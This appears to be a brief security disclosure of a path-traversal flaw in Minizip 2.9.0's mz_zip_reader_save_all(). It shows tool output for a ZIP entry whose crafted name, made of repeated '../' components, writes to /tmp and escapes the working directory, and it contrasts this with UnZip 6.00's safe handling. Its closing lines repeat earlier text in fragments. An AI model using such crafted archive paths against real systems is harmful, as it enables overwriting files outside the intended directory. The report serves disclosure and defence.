With a specially crafted ZIP file, Minizip (via mz_zip_reader_save_all()) will write into $CWD/..
Minizip 2.9.0 - https://github.com/nmoinvaz/minizip
---------------------------------------------------
-l t.zip
Packed Unpacked Ratio Method Attribs Date Time CRC-32 Name
------ -------- ----- ------ ------- ---- ---- ------ ----
17 17 100% Stored 81800080 11-04-06 11:33 c7f761e7 ././y/x/../../../../../../../tmp/zz
21 56 37% Defl:X 81800080 10-22-19 23:48 572b1c12 ././y/x/../../../../../../../tmp/zz
Extraction:
Minizip 2.9.0 - https://github.com/nmoinvaz/minizip
---------------------------------------------------
-x t.zip
Archive t.zip
Extracting ././y/x/../../../../../../../tmp/zz
The file ../tmp/zz exists. Overwrite ? [y]es, [n]o, [A]ll:
Note how e.g. UnZip 6.00 handles this situation:
$ unzip t.zip
Archive: t.zip
warning: skipped "../" path component(s) in ././y/x/../../../../../../../tmp/zz
extracting: y/x/tmp/zz
warning: skipped "../" path component(s) in ././y/x/../../../../../../../tmp/zz
replace y/x/tmp/zz? [y]es, [n]o, [A]ll, [N]one, [r]ename:
With a specially crafted ZIP file, Minizip (via
mz_zip_reader_save_all()) will write into $CWD/..Extraction:
Note how e.g.
UnZip 6.00handles this situation: